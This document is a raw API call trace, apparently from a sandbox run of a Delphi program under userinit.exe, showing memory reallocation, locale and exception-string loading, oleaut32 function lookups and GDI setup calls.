[0119.248] GlobalReAlloc (hMem=0x62000c, dwBytes=0xd4000, uFlags=0x2) returned 0x62000c
[0119.313] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.314] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.314] GlobalUnlock (hMem=0x62000c) returned 0
[0119.314] GlobalReAlloc (hMem=0x62000c, dwBytes=0xd6000, uFlags=0x2) returned 0x62000c
[0119.332] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.334] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.334] GlobalUnlock (hMem=0x62000c) returned 0
[0119.334] GlobalReAlloc (hMem=0x62000c, dwBytes=0xd8000, uFlags=0x2) returned 0x62000c
[0119.398] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.399] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.399] GlobalUnlock (hMem=0x62000c) returned 0
[0119.399] GlobalReAlloc (hMem=0x62000c, dwBytes=0xda000, uFlags=0x2) returned 0x62000c
[0119.417] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.418] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.418] GlobalUnlock (hMem=0x62000c) returned 0
[0119.418] GlobalReAlloc (hMem=0x62000c, dwBytes=0xdc000, uFlags=0x2) returned 0x62000c
[0119.436] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.437] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.437] GlobalUnlock (hMem=0x62000c) returned 0
[0119.437] GlobalReAlloc (hMem=0x62000c, dwBytes=0xde000, uFlags=0x2) returned 0x62000c
[0119.502] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.503] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.503] GlobalUnlock (hMem=0x62000c) returned 0
[0119.503] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe0000, uFlags=0x2) returned 0x62000c
[0119.521] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.522] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.522] GlobalUnlock (hMem=0x62000c) returned 0
[0119.522] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe2000, uFlags=0x2) returned 0x62000c
[0119.587] GlobalLock (hMem=0x62000c) returned 0x28c0020
[0119.588] GlobalHandle (pMem=0x28c0020) returned 0x62000c
[0119.588] GlobalUnlock (hMem=0x62000c) returned 0
[0119.588] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe4000, uFlags=0x2) returned 0x62000c
[0119.606] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.607] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.607] GlobalUnlock (hMem=0x62000c) returned 0
[0119.607] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe6000, uFlags=0x2) returned 0x62000c
[0119.626] GlobalLock (hMem=0x62000c) returned 0x28c0020
[0119.627] GlobalHandle (pMem=0x28c0020) returned 0x62000c
[0119.627] GlobalUnlock (hMem=0x62000c) returned 0
[0119.627] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe8000, uFlags=0x2) returned 0x62000c
[0119.694] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.695] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.695] GlobalUnlock (hMem=0x62000c) returned 0
[0119.695] GlobalReAlloc (hMem=0x62000c, dwBytes=0xea000, uFlags=0x2) returned 0x62000c
[0119.714] GlobalLock (hMem=0x62000c) returned 0x28c0020
[0119.715] GlobalHandle (pMem=0x28c0020) returned 0x62000c
[0119.715] GlobalUnlock (hMem=0x62000c) returned 0
[0119.715] GlobalReAlloc (hMem=0x62000c, dwBytes=0xec000, uFlags=0x2) returned 0x62000c
[0119.768] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.769] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.769] GlobalUnlock (hMem=0x62000c) returned 0
[0119.769] GlobalReAlloc (hMem=0x62000c, dwBytes=0xee000, uFlags=0x2) returned 0x62000c
[0119.789] GlobalLock (hMem=0x62000c) returned 0x28c0020
[0119.790] GlobalHandle (pMem=0x28c0020) returned 0x62000c
[0119.790] GlobalUnlock (hMem=0x62000c) returned 0
[0119.790] GlobalReAlloc (hMem=0x62000c, dwBytes=0xf0000, uFlags=0x2) returned 0x62000c
[0119.857] GlobalLock (hMem=0x62000c) returned 0x29b0020
[0119.858] GlobalHandle (pMem=0x29b0020) returned 0x62000c
[0119.858] GlobalUnlock (hMem=0x62000c) returned 0
[0119.858] GlobalReAlloc (hMem=0x62000c, dwBytes=0xf2000, uFlags=0x2) returned 0x62000c
[0119.878] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.879] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.879] GlobalUnlock (hMem=0x62000c) returned 0
[0119.879] GlobalReAlloc (hMem=0x62000c, dwBytes=0xf4000, uFlags=0x2) returned 0x62000c
[0119.946] GlobalLock (hMem=0x62000c) returned 0x28d0020
[0119.947] GlobalHandle (pMem=0x28d0020) returned 0x62000c
[0119.947] GlobalUnlock (hMem=0x62000c) returned 0
[0119.947] GlobalReAlloc (hMem=0x62000c, dwBytes=0xf6000, uFlags=0x2) returned 0x62000c
[0119.967] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.968] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.968] GlobalUnlock (hMem=0x62000c) returned 0
[0119.968] GlobalReAlloc (hMem=0x62000c, dwBytes=0xf8000, uFlags=0x2) returned 0x62000c
[0120.036] GlobalLock (hMem=0x62000c) returned 0x28d0020
[0120.037] GlobalHandle (pMem=0x28d0020) returned 0x62000c
[0120.037] GlobalUnlock (hMem=0x62000c) returned 0
[0120.037] GlobalReAlloc (hMem=0x62000c, dwBytes=0xfa000, uFlags=0x2) returned 0x62000c
[0120.057] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0120.058] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0120.058] GlobalUnlock (hMem=0x62000c) returned 0
[0120.058] GlobalReAlloc (hMem=0x62000c, dwBytes=0xfc000, uFlags=0x2) returned 0x62000c
[0120.080] GlobalLock (hMem=0x62000c) returned 0x28d0020
[0120.081] GlobalHandle (pMem=0x28d0020) returned 0x62000c
[0120.081] GlobalUnlock (hMem=0x62000c) returned 0
[0120.081] GlobalReAlloc (hMem=0x62000c, dwBytes=0xfe000, uFlags=0x2) returned 0x62000c
[0120.148] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0120.149] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0120.149] GlobalUnlock (hMem=0x62000c) returned 0
[0120.149] GlobalReAlloc (hMem=0x62000c, dwBytes=0x100000, uFlags=0x2) returned 0x62000c
[0120.173] GlobalLock (hMem=0x62000c) returned 0x28d0020
[0120.173] GlobalHandle (pMem=0x28d0020) returned 0x62000c
[0120.173] GlobalUnlock (hMem=0x62000c) returned 0
[0120.173] GlobalReAlloc (hMem=0x62000c, dwBytes=0x102000, uFlags=0x2) returned 0x62000c
[0120.197] GlobalLock (hMem=0x62000c) returned 0x29e0020
[0120.198] GlobalHandle (pMem=0x29e0020) returned 0x62000c
[0120.198] GlobalUnlock (hMem=0x62000c) returned 0
[0120.198] GlobalReAlloc (hMem=0x62000c, dwBytes=0x104000, uFlags=0x2) returned 0x62000c
[0120.253] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0120.254] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0120.254] GlobalUnlock (hMem=0x62000c) returned 0
[0120.254] GlobalReAlloc (hMem=0x62000c, dwBytes=0x106000, uFlags=0x2) returned 0x62000c
[0120.276] GlobalLock (hMem=0x62000c) returned 0x28e0020
[0120.277] GlobalHandle (pMem=0x28e0020) returned 0x62000c
[0120.277] GlobalUnlock (hMem=0x62000c) returned 0
[0120.277] GlobalReAlloc (hMem=0x62000c, dwBytes=0x108000, uFlags=0x2) returned 0x62000c
[0120.374] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0120.375] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0120.375] GlobalUnlock (hMem=0x62000c) returned 0
[0120.375] GlobalReAlloc (hMem=0x62000c, dwBytes=0x10a000, uFlags=0x2) returned 0x62000c
[0120.396] GlobalLock (hMem=0x62000c) returned 0x28e0020
[0120.397] GlobalHandle (pMem=0x28e0020) returned 0x62000c
[0120.397] GlobalUnlock (hMem=0x62000c) returned 0
[0120.397] GlobalReAlloc (hMem=0x62000c, dwBytes=0x10c000, uFlags=0x2) returned 0x62000c
[0120.420] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0120.421] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x28e0000
[0120.421] VirtualAlloc (lpAddress=0x28e0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x28e0000
[0120.479] GetKeyboardType (nTypeFlag=0) returned 4
[0120.479] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.479] GetStartupInfoA (in: lpStartupInfo=0x16f1a0 | out: lpStartupInfo=0x16f1a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0120.479] GetVersion () returned 0x1db10106
[0120.479] GetVersion () returned 0x1db10106
[0120.479] GetCurrentThreadId () returned 0xfd4
[0120.479] GetModuleFileNameA (in: hModule=0x29f0000, lpFilename=0x16ec9c, nSize=0x105 | out: lpFilename="\xac\xec\x16" (normalized: "c:\\windows\\system32\\“\x16")) returned 0x0
[0120.479] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16eb77, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.479] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16ec8c | out: phkResult=0x16ec8c*=0x0) returned 0x2
[0120.479] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16ec8c | out: phkResult=0x16ec8c*=0x0) returned 0x2
[0120.479] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16ec8c | out: phkResult=0x16ec8c*=0x0) returned 0x2
[0120.479] lstrcpynA (in: lpString1=0x16eb77, lpString2="\xac\xec\x16", iMaxLength=261 | out: lpString1="\xac\xec\x16") returned="\xac\xec\x16"
[0120.479] GetThreadLocale () returned 0x409
[0120.479] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x16ec87, cchData=5 | out: lpLCData="ENU") returned 4
[0120.480] lstrlenA (lpString="\xac\xec\x16") returned 3
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffc4, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0120.480] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6bdcc0
[0120.480] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2b10000
[0120.480] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6becc0
[0120.480] VirtualAlloc (lpAddress=0x2b10000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b10000
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffc3, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffc1, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffc2, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffd4, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffdd, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffd3, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffd0, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffd7, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffd6, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe8, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe9, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffea, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe7, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe5, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe3, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe2, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe1, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffe0, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0120.480] LoadStringA (in: hInstance=0x29f0000, uID=0xffff, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfffe, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfffd, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfffc, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfffb, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfffa, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfff9, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfff8, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfff7, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfff6, lpBuffer=0x16edc0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xfff4, lpBuffer=0x16edac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0120.481] LoadStringA (in: hInstance=0x29f0000, uID=0xffe4, lpBuffer=0x16edac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0120.481] GetVersionExA (in: lpVersionInformation=0x16f144*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x29f0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x9f\x02·\"\x9f\x02Üñ\x16") | out: lpVersionInformation=0x16f144*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0120.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.481] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0120.481] GetThreadLocale () returned 0x409
[0120.481] GetThreadLocale () returned 0x409
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Jan") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x16f01c, cchData=256 | out: lpLCData="January") returned 8
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Feb") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x16f01c, cchData=256 | out: lpLCData="February") returned 9
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Mar") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x16f01c, cchData=256 | out: lpLCData="March") returned 6
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Apr") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x16f01c, cchData=256 | out: lpLCData="April") returned 6
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x16f01c, cchData=256 | out: lpLCData="May") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x16f01c, cchData=256 | out: lpLCData="May") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Jun") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x16f01c, cchData=256 | out: lpLCData="June") returned 5
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Jul") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x16f01c, cchData=256 | out: lpLCData="July") returned 5
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Aug") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x16f01c, cchData=256 | out: lpLCData="August") returned 7
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Sep") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x16f01c, cchData=256 | out: lpLCData="September") returned 10
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Oct") returned 4
[0120.481] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x16f01c, cchData=256 | out: lpLCData="October") returned 8
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Nov") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x16f01c, cchData=256 | out: lpLCData="November") returned 9
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Dec") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x16f01c, cchData=256 | out: lpLCData="December") returned 9
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Sun") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Sunday") returned 7
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Mon") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Monday") returned 7
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Tue") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Wed") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Thu") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Thursday") returned 9
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Fri") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Friday") returned 7
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Sat") returned 4
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x16f01c, cchData=256 | out: lpLCData="Saturday") returned 9
[0120.482] GetThreadLocale () returned 0x409
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x16f078, cchData=256 | out: lpLCData="$") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x16f078, cchData=256 | out: lpLCData="0") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x16f078, cchData=256 | out: lpLCData="0") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x16f170, cchData=2 | out: lpLCData=",") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x16f170, cchData=2 | out: lpLCData=".") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x16f078, cchData=256 | out: lpLCData="2") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x16f170, cchData=2 | out: lpLCData="/") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x16f078, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0120.482] GetThreadLocale () returned 0x409
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x16f044, cchData=256 | out: lpLCData="1") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x16f078, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0120.482] GetThreadLocale () returned 0x409
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x16f044, cchData=256 | out: lpLCData="1") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x16f170, cchData=2 | out: lpLCData=":") returned 2
[0120.482] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x16f078, cchData=256 | out: lpLCData="AM") returned 3
[0120.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x16f078, cchData=256 | out: lpLCData="PM") returned 3
[0120.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x16f078, cchData=256 | out: lpLCData="0") returned 2
[0120.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x16f078, cchData=256 | out: lpLCData="0") returned 2
[0120.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x16f078, cchData=256 | out: lpLCData="0") returned 2
[0120.483] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x16f170, cchData=2 | out: lpLCData=",") returned 2
[0120.483] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0120.483] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0120.484] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0120.484] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0120.484] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0120.484] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0120.485] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0120.485] GetDC (hWnd=0x0) returned 0x1801089c
[0120.485] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0120.485] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.485] GetDC (hWnd=0x0) returned 0x1801089c
[0120.485] GetDeviceCaps (hdc=0x1801089c, index=104) returned 0
[0120.485] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.485] CreatePalette (plpal=0x16edd4) returned 0x4708085a
[0120.485] GetStockObject (i=7) returned 0x1b00017
[0120.485] GetStockObject (i=5) returned 0x1900015
[0120.485] GetStockObject (i=13) returned 0x18a002e
[0120.485] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0120.485] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff3d, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0120.485] LoadStringA (in: hInstance=0x29f0000, uID=0xff3c, lpBuffer=0x16edd0, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
